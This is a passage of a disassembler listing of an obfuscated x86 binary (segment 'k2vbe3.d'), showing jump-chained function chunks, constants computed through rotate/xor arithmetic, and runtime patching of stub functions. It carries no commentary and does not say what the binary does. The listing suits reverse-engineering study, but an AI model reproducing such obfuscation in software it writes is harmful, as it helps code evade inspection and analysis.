		call	sub_440C7D
sub_450740	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_44B359

loc_450745:				; CODE XREF: sub_44B359+189Aj
		jmp	loc_44E184
; END OF FUNCTION CHUNK	FOR sub_44B359
; ---------------------------------------------------------------------------
		adc	ecx, edi
		jmp	sub_44083C
; ---------------------------------------------------------------------------

loc_450751:				; DATA XREF: sub_441D41:loc_457E92o
		mov	eax, [ebp-4]
		push	eax
		push	ebx
		push	14637431h
		pop	ebx
		rol	ebx, 8
		add	ebx, 9CD0CCFBh
		jmp	loc_44CF05
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44921C

loc_45076A:				; CODE XREF: sub_44921C:loc_449228j
		pop	eax
		and	eax, 0A9A7493h
		jnz	loc_451945

loc_450777:				; CODE XREF: k2vbe3.d:0043F440j
		jmp	loc_451A72
; END OF FUNCTION CHUNK	FOR sub_44921C
; ---------------------------------------------------------------------------
		push	0F233623Eh
		jmp	loc_45193F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4553CC

loc_450786:				; CODE XREF: sub_4553CC-5E41j
		jz	loc_453AC8
		popf
		jmp	loc_453AC2
; END OF FUNCTION CHUNK	FOR sub_4553CC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FE2A

loc_450792:				; CODE XREF: sub_43FE2A:loc_449DB5j
		mov	[esi], eax
		pop	esi
		lea	eax, nullsub_8
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_8
; END OF FUNCTION CHUNK	FOR sub_43FE2A
; ---------------------------------------------------------------------------
		pop	edx
		mov	eax, [esp]
		push	edx
		call	sub_444615
		jmp	loc_4420C9
; ---------------------------------------------------------------------------
		adc	ebx, edx
		jnb	loc_445F7F
		jmp	sub_44FBDF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45C041

loc_4507BF:				; CODE XREF: sub_45C041-5B2Ej
		jl	loc_45291D

loc_4507C5:				; CODE XREF: sub_45C041:loc_456506j
		rol	ecx, 6
		and	ecx, 0E93137ABh
		xor	ecx, 6D0ED9C1h
		call	sub_444BEA
; END OF FUNCTION CHUNK	FOR sub_45C041
; START	OF FUNCTION CHUNK FOR sub_454EDD

loc_4507D9:				; CODE XREF: sub_454EDD-3A1j
		jmp	loc_442AB4
; END OF FUNCTION CHUNK	FOR sub_454EDD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440CEA

loc_4507DE:				; CODE XREF: sub_440CEA-3215j
		jmp	loc_4575F4
; END OF FUNCTION CHUNK	FOR sub_440CEA

; =============== S U B	R O U T	I N E =======================================



sub_4507E3	proc near		; CODE XREF: sub_456C5F-15E97p
					; k2vbe3.d:004424E4j

; FUNCTION CHUNK AT 0043D3EB SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043DCA5 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0043E101 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440997 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446519 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044DD53 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044E47C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044FAC7 SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		push	edx
		push	6F2FD70Fh
		pop	edx
		add	edx, 0FE3DE358h
		rol	edx, 9
		jmp	loc_440997
sub_4507E3	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AFD4

loc_4507FC:				; CODE XREF: sub_44AFD4:loc_43C2A5j
					; sub_453F17:loc_458739j
		lea	eax, [ebp-24h]
		push	edi
		mov	edi, eax
		push	offset loc_44A68F
		jmp	sub_454099
; END OF FUNCTION CHUNK	FOR sub_44AFD4

; =============== S U B	R O U T	I N E =======================================



sub_45080C	proc near		; CODE XREF: sub_449372:loc_448BA2p
					; k2vbe3.d:00448D54j

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 004560DF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456CD1 SIZE 00000008 BYTES

		xchg	edi, [esp+0]
		pop	edi
		push	639370Ah
		pop	edi
		and	edi, 7F58925Dh
		add	edi, 0FA2C9E6Ah
		jmp	loc_4560DF
sub_45080C	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		test	al, al
		jz	loc_44BAD2
		jmp	loc_45220B
; ---------------------------------------------------------------------------

loc_450834:				; DATA XREF: sub_43FFDC:loc_440443o
		lea	eax, sub_4440B5
		push	offset sub_43CCC8
		jmp	loc_43E80F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444D7B

loc_450844:				; CODE XREF: sub_444D7B:loc_456A72j
					; k2vbe3.d:00456A90j
		sub	eax, 0A60F4B90h
		rol	eax, 1Ah
		add	eax, 10E2F60Ah
		mov	eax, [eax]
		pushf
		push	0CDC1A1E6h
		pop	edx
		rol	edx, 0Ch
		jmp	loc_44A4CF
; END OF FUNCTION CHUNK	FOR sub_444D7B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FB9B

loc_450864:				; CODE XREF: sub_43FB9B-CB8j
					; sub_43FB9B+9j ...
		jnz	loc_43EEEA
		sub	ebx, 10000h
		mov	eax, [ebx]
		neg	eax
		jmp	loc_43EEDF
; END OF FUNCTION CHUNK	FOR sub_43FB9B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_450879:				; CODE XREF: sub_44C90E-D66Cj
		jz	loc_456793
		jmp	loc_445F1B
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CCD0

loc_450884:				; CODE XREF: sub_43CCD0+191F6j
		add	ecx, 0F582C91Eh
		jmp	loc_4501EB
; END OF FUNCTION CHUNK	FOR sub_43CCD0

; =============== S U B	R O U T	I N E =======================================



sub_45088F	proc near		; CODE XREF: sub_458905p
					; k2vbe3.d:0045B9B9j
		xchg	esi, [esp+0]
		pop	esi
		mov	eax, 0E7h
		retn
sub_45088F	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443FC1

loc_450899:				; CODE XREF: sub_443FC1+15328j
		jmp	loc_440458
; END OF FUNCTION CHUNK	FOR sub_443FC1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453FF1

loc_45089E:				; CODE XREF: sub_453FF1-1642Dj
		jmp	loc_43E8C7
; END OF FUNCTION CHUNK	FOR sub_453FF1

; =============== S U B	R O U T	I N E =======================================



sub_4508A3	proc near		; CODE XREF: sub_44945C-C91Cj
					; sub_43F0FF+17j ...

; FUNCTION CHUNK AT 0044389E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A06A SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044B968 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004566EE SIZE 0000000A BYTES

		jnz	sub_4574AE
		push	ebp
		jmp	loc_44389E
sub_4508A3	endp


; =============== S U B	R O U T	I N E =======================================



sub_4508AF	proc near		; DATA XREF: sub_455500+11o

; FUNCTION CHUNK AT 0043C930 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044F495 SIZE 00000007 BYTES

		xor	eax, 5FBA6BA4h
		add	eax, 6EE1E0A5h
		call	sub_44C9DC

loc_4508C0:				; CODE XREF: sub_45299C+15j
		jmp	loc_43C930
sub_4508AF	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_4508C5	proc near		; DATA XREF: sub_441409+18CF1o

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0044B6A8 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044B71F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453480 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00458ABE SIZE 0000000B BYTES

		xchg	eax, [esp+0]
		push	eax
		mov	eax, edi
		xchg	eax, [esp+4+var_4]
		push	0E44281BAh
		pop	edi
		xor	edi, 446ECF0Ah
		jmp	loc_453480
sub_4508C5	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446CCF

loc_4508DF:				; CODE XREF: sub_446CCF:loc_4563CCj
		cmp	dword ptr [ebp-4], 0
		jnz	loc_4475E1
		lea	eax, [ebp-125h]
		push	eax
		call	sub_4475D5
; END OF FUNCTION CHUNK	FOR sub_446CCF
; START	OF FUNCTION CHUNK FOR sub_4455EE

loc_4508F5:				; CODE XREF: sub_4455EE:loc_454F32j
		push	offset sub_446CE6
		jmp	nullsub_178
; END OF FUNCTION CHUNK	FOR sub_4455EE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448D7F

loc_4508FF:				; CODE XREF: sub_448D7F:loc_447F3Dj
		push	edx
		call	sub_4479A1
		mov	eax, 2DC123E0h
		call	sub_4553CC
		push	esi
		jmp	loc_44E9EC
; END OF FUNCTION CHUNK	FOR sub_448D7F
; ---------------------------------------------------------------------------
		cmp	edx, edi
		jmp	loc_44BB45
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454AD4

loc_45091C:				; CODE XREF: sub_454AD4-274Dj
		jns	loc_4481A3

loc_450922:				; CODE XREF: sub_448512:loc_45236Cj
		add	ecx, 68841F7Fh
		xchg	ecx, [esp+0]
		jmp	loc_45AECF
; END OF FUNCTION CHUNK	FOR sub_454AD4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4402FA

loc_450930:				; CODE XREF: sub_4402FA:loc_447423j
		and	esi, eax
		pop	ebx
		jmp	loc_44A89D
; END OF FUNCTION CHUNK	FOR sub_4402FA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D45F

loc_450938:				; CODE XREF: sub_43D45F+C36Dj
		xor	esi, 0CE988877h
		xor	eax, esi
		pop	esi
		push	ecx
		pushf
		push	150BE20Ah
		pop	ecx
		rol	ecx, 1Eh
		jmp	loc_4493A1
; END OF FUNCTION CHUNK	FOR sub_43D45F
; ---------------------------------------------------------------------------

loc_450951:				; CODE XREF: k2vbe3.d:0044337Cj
		jnz	loc_44A1FC
		rol	ebx, 19h
		sbb	edx, edi
		mov	ebp, edx
		jmp	loc_44EDF1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44EEFE

loc_450963:				; CODE XREF: sub_44EEFE:loc_44453Dj
		jnb	loc_44278B
		mov	eax, [esp+0]
		push	edx
		push	ecx
		push	8C197007h
		pop	ecx
		jmp	loc_44EA8A
; END OF FUNCTION CHUNK	FOR sub_44EEFE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44128B

loc_450979:				; CODE XREF: sub_44128B:loc_43C5AAj
		push	offset sub_4541D3
		jmp	loc_443487
; END OF FUNCTION CHUNK	FOR sub_44128B

; =============== S U B	R O U T	I N E =======================================



sub_450983	proc near		; DATA XREF: sub_44BDBB-DF7Co

; FUNCTION CHUNK AT 0043C62B SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0043CC83 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043DA9C SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0043DAB0 SIZE 00000003 BYTES
; FUNCTION CHUNK AT 0043DF61 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00442A1F SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004436DF SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00443D34 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044FB5F SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00451059 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004550A0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045AE6F SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045C1E4 SIZE 0000001E BYTES

		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_43DAAB
		jmp	loc_43CC83
sub_450983	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A9B3

loc_450992:				; CODE XREF: sub_45A9B3:loc_4589B5j
		rol	edx, 6
		add	edx, 560B35ACh
		xchg	edx, [esp+4+var_4]
		jmp	loc_456F21
; END OF FUNCTION CHUNK	FOR sub_45A9B3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BECA

loc_4509A3:				; CODE XREF: sub_44BECA+9j
		pop	esi
		mov	eax, [esp+0]
		push	eax
		mov	eax, esi
		xchg	eax, [esp-8+arg_4]
		mov	esi, edx
		xchg	esi, [esp-8+arg_4]
		call	sub_4599AA
		jmp	loc_43FA8A
; END OF FUNCTION CHUNK	FOR sub_44BECA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4534C2

loc_4509BC:				; CODE XREF: sub_4534C2:loc_44EA51j
		push	0B7D2FEC6h
		pop	edx
		xor	edx, 0CB1DDD09h
		sub	edx, 3B1BBCCCh
		rol	edx, 1
		add	edx, 7C9931FAh
		xchg	edx, [esp+0]

loc_4509D9:				; CODE XREF: sub_44314D+3878j
		push	0CC91414Dh
		jmp	loc_449793
; END OF FUNCTION CHUNK	FOR sub_4534C2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B94B

loc_4509E3:				; CODE XREF: sub_44B94B+1736j
		jp	sub_456471
		mov	ecx, [ebx]
		jmp	loc_43F0C5
; END OF FUNCTION CHUNK	FOR sub_44B94B
; ---------------------------------------------------------------------------

loc_4509F0:				; CODE XREF: k2vbe3.d:00447492j
		cmp	edx, esi
		jmp	loc_44632C
; ---------------------------------------------------------------------------
		mov	eax, 38F24592h
		push	eax
		push	525C14B6h
		pop	eax
		xor	eax, 0AB400222h
		js	loc_457BD4
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_450A0F:				; CODE XREF: sub_44C90E-95B6j
		jmp	loc_4462D0
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------
		jnb	loc_44F99A
		jmp	loc_457BCE
; ---------------------------------------------------------------------------

locret_450A1F:				; CODE XREF: k2vbe3.d:loc_448596j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4537C9

loc_450A20:				; CODE XREF: sub_4537C9+Dj
		jmp	loc_440882
; END OF FUNCTION CHUNK	FOR sub_4537C9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E059

loc_450A25:				; CODE XREF: sub_44E059-9EBEj
		jmp	loc_4438C7
; END OF FUNCTION CHUNK	FOR sub_44E059
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4572F6

loc_450A2A:				; CODE XREF: sub_4572F6:loc_459413j
		ror	esi, 10h
		push	edi
		mov	edx, eax
		jmp	loc_4475BE
; END OF FUNCTION CHUNK	FOR sub_4572F6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441172

loc_450A35:				; CODE XREF: sub_441172:loc_449BE9j
		jz	loc_44631C
		jmp	loc_448FFF
; END OF FUNCTION CHUNK	FOR sub_441172

; =============== S U B	R O U T	I N E =======================================



sub_450A40	proc near		; DATA XREF: sub_44ED3C-2E9Do

; FUNCTION CHUNK AT 0044D8F1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004578AE SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004596EC SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0045977E SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0045C2FD SIZE 0000000B BYTES

		cmp	byte ptr [ebp-5], 0
		jnz	loc_446C00
		jmp	loc_45C2FD
sub_450A40	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4426DF

loc_450A4F:				; CODE XREF: sub_4426DF:loc_443E98j
		adc	ebx, ecx
		sbb	eax, edx
		jmp	loc_43E99D
; END OF FUNCTION CHUNK	FOR sub_4426DF
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_472. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E388

loc_450A59:				; CODE XREF: sub_44E388-9DC0j
		jmp	loc_44BBFF
; END OF FUNCTION CHUNK	FOR sub_44E388
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4440B5

loc_450A5E:				; CODE XREF: sub_4440B5:loc_45703Ej
		push	eax
		mov	eax, edx
		xchg	eax, [esp+4+var_4]
		call	sub_4479A1
		mov	eax, 1AABF86Ch
		push	edx
		push	3B1867C4h
		pop	edx
		jmp	loc_453E29
; END OF FUNCTION CHUNK	FOR sub_4440B5
; ---------------------------------------------------------------------------

loc_450A7A:				; CODE XREF: k2vbe3.d:0044356Aj
		or	ecx, eax

; =============== S U B	R O U T	I N E =======================================



sub_450A7C	proc near		; CODE XREF: k2vbe3.d:loc_451A4Cp

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00442E7A SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004466D8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004547A4 SIZE 0000001F BYTES

		xchg	edi, [esp+0]
		pop	edi
		xchg	ebx, [esp-4+arg_0]
		call	sub_44E481
		push	57881442h
		pop	eax
		add	eax, 7F1D4A09h
		jmp	loc_4547A4
sub_450A7C	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_450A99	proc near		; DATA XREF: sub_4401FF:loc_44C28Do

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043ED62 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044DA60 SIZE 00000005 BYTES

		mov	eax, [ebp-8]
		push	ebx
		mov	ebx, eax
		xchg	ebx, [esp+4+var_4]
		jmp	loc_44DA60
sub_450A99	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4426DF

loc_450AA7:				; CODE XREF: sub_4426DF:loc_4490A0j
		pushf
		push	0ADA41672h
		pop	edx
		rol	edx, 10h
		jmp	loc_447EA3
; END OF FUNCTION CHUNK	FOR sub_4426DF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444B3E

loc_450AB6:				; CODE XREF: sub_444B3E-29C1j
		mov	eax, [eax]
		xor	edx, edx
		push	edx
		push	esi
		mov	esi, eax
		xchg	esi, [esp+4+var_4]
		mov	eax, [ebp-4]
		mov	eax, [eax+3Ch]
		jmp	loc_43F342
; END OF FUNCTION CHUNK	FOR sub_444B3E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_116. PRESS KEYPAD	"+" TO EXPAND]
		db 89h,	0D4h, 43h
		dd 8B5AFFFFh, 8B562404h, 0E944E9F2h
		db 0FEh, 0FFh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454FA8

loc_450ADE:				; CODE XREF: sub_454FA8+23C3j
		shr	ebp, 1Eh
		mov	edi, edx

loc_450AE3:				; CODE XREF: sub_454FA8:loc_44B229j
		call	sub_44128B
		mov	edx, 0B70DD039h
		call	sub_45B20A
		jmp	sub_43C7B9
; END OF FUNCTION CHUNK	FOR sub_454FA8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449CAB

loc_450AF7:				; CODE XREF: sub_449CAB+Fj
		pop	ebx
		sub	ebx, 787CF0E7h
		cmp	ebx, 7780080Bh
		jmp	loc_454F78
; END OF FUNCTION CHUNK	FOR sub_449CAB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_450B09:				; CODE XREF: sub_45A323-B6A1j
		jo	loc_44D83C
		js	loc_45A18C
		shl	ebp, 11h
		pop	edi
		jmp	loc_45A588
; END OF FUNCTION CHUNK	FOR sub_45A323

; =============== S U B	R O U T	I N E =======================================



sub_450B1E	proc near		; CODE XREF: sub_443A95+1j
		push	ebp
		pop	ecx
		call	sub_4500BB

locret_450B25:				; CODE XREF: sub_45A323:loc_45A460j
		retn
sub_450B1E	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455C7A

loc_450B26:				; CODE XREF: sub_455C7A+42ABj
		jmp	loc_4516AB
; END OF FUNCTION CHUNK	FOR sub_455C7A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454E69

loc_450B2B:				; CODE XREF: sub_454E69+4E80j
		jmp	loc_45003C
; END OF FUNCTION CHUNK	FOR sub_454E69
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446258

loc_450B30:				; CODE XREF: sub_446258+16E9j
		jmp	loc_45551B
; END OF FUNCTION CHUNK	FOR sub_446258
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457D4B

loc_450B35:				; CODE XREF: sub_457D4B-130DEj
		jz	loc_45AD06
		jmp	loc_457CF6
; END OF FUNCTION CHUNK	FOR sub_457D4B
; ---------------------------------------------------------------------------
		push	5FA64F53h
		pop	edx
		xor	edx, 0ECF60C05h
		cmp	edx, 0BC8E56C0h
		jmp	loc_452C58
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45496E

loc_450B57:				; CODE XREF: sub_45496E:loc_4505B0j
		ror	eax, 12h
		add	eax, 14AC407Bh
		xor	eax, 72962172h
		ror	eax, 5
		mov	edx, [esp+0]
		jmp	loc_457954
; END OF FUNCTION CHUNK	FOR sub_45496E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D298

loc_450B71:				; CODE XREF: sub_44D298:loc_43FF06j
		test	edx, 0DB728C7Ch
		jmp	loc_450FC7
; END OF FUNCTION CHUNK	FOR sub_44D298
; ---------------------------------------------------------------------------

loc_450B7C:				; CODE XREF: k2vbe3.d:00450EF8j
		jge	loc_453277

; =============== S U B	R O U T	I N E =======================================



sub_450B82	proc near		; CODE XREF: sub_442D04+7CD9p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043F9D3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004555C0 SIZE 00000014 BYTES

		xchg	esi, [esp+0]
		pop	esi
		push	88C47DC4h
		pop	ecx
		rol	ecx, 1Bh
		jmp	loc_4555C0
sub_450B82	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E0F6

loc_450B94:				; CODE XREF: sub_44E0F6:loc_459580j
		xchg	edi, [esp+0]
		jmp	sub_445047
; END OF FUNCTION CHUNK	FOR sub_44E0F6
; ---------------------------------------------------------------------------
		or	ebx, 0B3D80661h
		jmp	loc_4454E9
; ---------------------------------------------------------------------------
		jge	loc_447A71
		jmp	sub_43FE0A
; ---------------------------------------------------------------------------

loc_450BB2:				; CODE XREF: k2vbe3.d:loc_44C951j
		push	7D358C62h
		pop	ebx
		or	ebx, 15116579h

loc_450BBE:				; CODE XREF: k2vbe3.d:loc_440609j
		and	ebx, 49038C77h
		cmp	ebx, 0C630B824h
		jmp	loc_449B26
; ---------------------------------------------------------------------------

loc_450BCF:				; DATA XREF: sub_43D98C+4E5Bo
		mov	dword ptr [ebp-8], 1
; START	OF FUNCTION CHUNK FOR sub_43D98C

loc_450BD6:				; CODE XREF: k2vbe3.d:loc_43C3C9j
					; sub_43D98C+2355j
		mov	eax, [ebp+var_8]

loc_450BD9:				; CODE XREF: k2vbe3.d:004480FDj
		pop	ecx
		push	offset loc_43FCD4
		jmp	nullsub_222
; END OF FUNCTION CHUNK	FOR sub_43D98C
; ---------------------------------------------------------------------------

loc_450BE4:				; CODE XREF: k2vbe3.d:loc_44510Fj
		push	offset sub_44E827
		jmp	loc_44DC79
; ---------------------------------------------------------------------------
		and	eax, esi
		jmp	sub_45BC98
; ---------------------------------------------------------------------------
		xor	ebx, 0E47A4100h
		test	edx, 49989A0Dh
		jmp	loc_4488FD
; ---------------------------------------------------------------------------
		sub	edx, 39233B17h
		jmp	loc_44A539
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440EE3

loc_450C11:				; CODE XREF: sub_440EE3+B461j
		pop	edi
		add	eax, 540A3F51h
		ror	eax, 8
		add	eax, 0DD5EF1Ah
		jmp	loc_43D401
; END OF FUNCTION CHUNK	FOR sub_440EE3

; =============== S U B	R O U T	I N E =======================================



sub_450C26	proc near		; DATA XREF: k2vbe3.d:00444494o

; FUNCTION CHUNK AT 0045AAB2 SIZE 00000005 BYTES

		lea	eax, nullsub_494
		mov	byte ptr [eax],	0C3h
		jmp	loc_45AAB2
sub_450C26	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CCD0

loc_450C34:				; CODE XREF: k2vbe3.d:0043E4ACj
					; sub_43CCD0+B19Fj
		mov	eax, [esp+8+var_8]
		push	ebp
		mov	ebp, edx
		xchg	ebp, [esp+0Ch+var_C]
		push	edx
		jmp	loc_45A5FA
; END OF FUNCTION CHUNK	FOR sub_43CCD0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_450C43:				; CODE XREF: sub_44C90E:loc_43FC15j
		lea	eax, loc_452F21
		call	sub_4511F7

loc_450C4E:				; CODE XREF: sub_44543E+13j
		jmp	loc_45008D
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4505F8

loc_450C53:				; CODE XREF: sub_4505F8-11AE0j
		jmp	loc_444E6B
; END OF FUNCTION CHUNK	FOR sub_4505F8
; ---------------------------------------------------------------------------

loc_450C58:				; CODE XREF: k2vbe3.d:004586E3j
		add	eax, 0F3D71995h
		or	eax, eax
		jz	loc_43F765
		jmp	loc_44D829
; ---------------------------------------------------------------------------

loc_450C6B:				; CODE XREF: k2vbe3.d:loc_455AE6j
		mov	esi, edx
		xchg	esi, [esp]
		push	2DC05E93h
		pop	edx
		sub	edx, 7160D110h
		jmp	loc_457C0E
; ---------------------------------------------------------------------------

loc_450C81:				; DATA XREF: k2vbe3.d:0044E249o
		add	eax, [ebp-4]
		call	sub_4402FA
		cmp	eax, [ebp-8]
		jnz	loc_44D604
		mov	eax, [ebp-14h]
		push	offset sub_43E69A
		jmp	locret_4511BB
; ---------------------------------------------------------------------------

loc_450C9F:				; CODE XREF: k2vbe3.d:loc_44AB17j
		pushf
		push	offset sub_446BEB
		jmp	locret_44EA24
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_450CAA:				; CODE XREF: sub_44C90E-69F1j
		xor	ebp, ebx
		mov	ecx, 1238C591h
		shr	edi, 0Fh
		and	esi, 0A41083C0h
		jmp	loc_456793
; END OF FUNCTION CHUNK	FOR sub_44C90E

; =============== S U B	R O U T	I N E =======================================



sub_450CBF	proc near		; CODE XREF: sub_4500BB-103Ap

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch

; FUNCTION CHUNK AT 0043D696 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00440475 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004462A7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A743 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044D06E SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00451BFA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455DFE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004563A2 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045743B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00458CD2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458F99 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045908E SIZE 0000000D BYTES

		xchg	eax, [esp+0]
		pop	eax
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_44A74E
		jmp	loc_440475
sub_450CBF	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_450CD2:				; CODE XREF: k2vbe3.d:004596E7j
		popf
		pop	eax
		ja	loc_4538E4

loc_450CDA:				; CODE XREF: k2vbe3.d:loc_45BC2Aj
		call	sub_442DDF
		retn
; ---------------------------------------------------------------------------

loc_450CE0:				; CODE XREF: k2vbe3.d:004416DAj
					; k2vbe3.d:loc_459083j
		push	edi
		jmp	loc_4592D2
; ---------------------------------------------------------------------------

loc_450CE6:				; CODE XREF: k2vbe3.d:0043CBEAj
		popf

; =============== S U B	R O U T	I N E =======================================



sub_450CE7	proc near		; CODE XREF: sub_440CEA:loc_457AFCp

; FUNCTION CHUNK AT 0044AE3A SIZE 00000018 BYTES

		xchg	eax, [esp+0]
		pop	eax
		push	esi
		jmp	loc_44AE3A
sub_450CE7	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A7C2

loc_450CF1:				; CODE XREF: sub_44A7C2:loc_449D2Aj
		mov	ebp, ecx
		xchg	ebp, [esp+4+var_4]
		mov	[ebp+var_4], eax
		push	6211AABCh
		pop	eax
		or	eax, 0F4F55501h
		jmp	loc_44220E
; END OF FUNCTION CHUNK	FOR sub_44A7C2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45BC98

loc_450D0A:				; CODE XREF: sub_45BC98+Dj
		jno	loc_4486A8
		xor	eax, 0A0984C27h
		mov	edx, [esp+4+var_4]
		push	esi
		mov	esi, eax
		push	offset loc_4588A9
		jmp	nullsub_441
; END OF FUNCTION CHUNK	FOR sub_45BC98
; ---------------------------------------------------------------------------

loc_450D26:				; CODE XREF: k2vbe3.d:004493DFj
		jnb	loc_44F345
		push	ecx
